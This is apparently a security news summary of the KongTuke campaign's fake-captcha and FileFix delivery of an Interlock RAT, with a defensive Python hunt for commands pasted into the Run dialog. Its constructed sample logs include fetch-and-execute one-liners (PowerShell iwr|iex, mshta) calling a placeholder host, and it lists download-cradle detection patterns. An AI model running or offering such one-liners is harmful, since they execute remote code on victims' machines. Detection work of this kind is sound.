KongTuke Campaign Deploys Modified Interlock RAT Using FileFix Method Against Windows Environments

Researchers from The DFIR Report, collaborating with Proofpoint, have uncovered a resilient PHP-based variant of the Interlock ransomware group’s remote access trojan (RAT), marking a significant evolution from the previously documented JavaScript-driven NodeSnake. This adaptation, observed in campaigns linked to the LandUpdate808 threat cluster, also known as KongTuke, has been active since May 2025, exploiting compromised websites to deliver malicious payloads.

The infection chain begins with a single-line script injected into a compromised website’s HTML, often unnoticed by site owners or visitors, which applies strict IP filtering so that only selected visitors are served a JavaScript payload. This payload tricks users into “verifying” they are human via a fake captcha prompt, then instructs them to paste clipboard content into the Windows Run dialog, which ultimately executes a PowerShell script that deploys the Interlock RAT.
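The execution step described above leaves a distinctive telemetry trace: the Run dialog is hosted by explorer.exe, so the pasted command produces a process-creation event where explorer.exe is the direct parent of powershell.exe (or another script host). The hunt below is an added example written for this summary, not code from The DFIR Report, Proofpoint, or the campaign itself. It parses constructed Sysmon-style Event ID 1 records (field names follow Sysmon, but every record and the `EXAMPLE-PLACEHOLDER.invalid` host are made up), scores explorer-parented interpreters by command-line traits typical of a pasted one-liner, and returns only the events that cross a threshold, so an ordinary `cmd /c dir` typed into Run is not flagged.

```python
"""
Hunt for ClickFix/FileFix-style execution: a command pasted into the Windows
Run dialog (Win+R) runs with explorer.exe as the parent process. The records
below are constructed samples in a simplified Sysmon Event ID 1 key=value
form; they are not from any real incident.
"""
import re
from dataclasses import dataclass

# Constructed sample telemetry. The host name is a deliberate placeholder.
SAMPLE_LOGS = """\
EventID=1 ParentImage=C:\\Windows\\explorer.exe Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe CommandLine="powershell -w hidden -ep bypass -c iwr http://EXAMPLE-PLACEHOLDER.invalid/x | iex" User=CORP\\alice
EventID=1 ParentImage=C:\\Windows\\explorer.exe Image=C:\\Windows\\System32\\notepad.exe CommandLine="notepad.exe" User=CORP\\alice
EventID=1 ParentImage="C:\\Program Files\\Microsoft VS Code\\Code.exe" Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe CommandLine="powershell -NoProfile" User=CORP\\bob
EventID=1 ParentImage=C:\\Windows\\explorer.exe Image=C:\\Windows\\System32\\mshta.exe CommandLine="mshta http://EXAMPLE-PLACEHOLDER.invalid/a.hta" User=CORP\\carol
EventID=1 ParentImage=C:\\Windows\\explorer.exe Image=C:\\Windows\\System32\\cmd.exe CommandLine="cmd /c dir" User=CORP\\dave
"""

# Script hosts and download helpers that a pasted Run-dialog command typically invokes.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "curl.exe", "certutil.exe"}

# Command-line traits common to a one-liner that fetches and runs remote code.
# Each adds one point to the event's score; matched case-insensitively.
INDICATORS = [
    (r"-(w|windowstyle)\s+hidden", "hidden window"),
    (r"-(ep|executionpolicy)\s+bypass", "execution policy bypass"),
    (r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", "encoded command"),
    (r"\b(iwr|invoke-webrequest|downloadstring|invoke-expression|iex|curl|wget)\b",
     "download/eval cradle"),
    (r"https?://", "remote URL"),
]

# key=value pairs; a double-quoted value may contain spaces.
FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


@dataclass
class Finding:
    user: str
    image: str
    command_line: str
    score: int
    reasons: list


def parse_event(line):
    """Turn one key=value record into a dict."""
    return {key: (quoted or bare) for key, quoted, bare in FIELD_RE.findall(line)}


def basename(path):
    """Lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def assess(event):
    """Score a process-creation event; None if it is not an explorer-parented interpreter."""
    if event.get("EventID") != "1":
        return None
    if basename(event.get("ParentImage", "")) != "explorer.exe":
        return None
    image = basename(event.get("Image", ""))
    if image not in INTERPRETERS:
        return None
    cmd = event.get("CommandLine", "")
    # One point for the parent/child pairing itself, then one per matching trait.
    reasons = ["interpreter launched directly from explorer.exe (Run dialog or shell)"]
    for pattern, label in INDICATORS:
        if re.search(pattern, cmd, re.IGNORECASE):
            reasons.append(label)
    return Finding(event.get("User", "?"), image, cmd, len(reasons), reasons)


def hunt(log_text, threshold=2):
    """Return findings whose score reaches the threshold, in log order."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        finding = assess(parse_event(line))
        if finding and finding.score >= threshold:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_LOGS):
        print(f"[score {f.score}] {f.user} -> {f.image}: {f.command_line}")
        for reason in f.reasons:
            print(f"    - {reason}")
```

The threshold exists because explorer.exe legitimately parents PowerShell whenever a user opens a shortcut or types into Run, so the parent/child pair alone is a weak signal; the hidden-window, policy-bypass and download-cradle traits are what separate a pasted lure from normal use. On the endpoint, the same activity is also recorded in the per-user `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU` key, which is worth collecting alongside process telemetry when scoping an incident.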

Proofpoint has tracked both Node.js and PHP variants, with the latter first appearing in June 2025, and recent observations indicate a shift to a FileFix delivery mechanism that deploys the PHP RAT, sometimes escalating to the Node.js version for deeper network persistence.

Read More:

https://gbhackers.com/kongtuke-campaign-deploys-modified-interlock-rat/
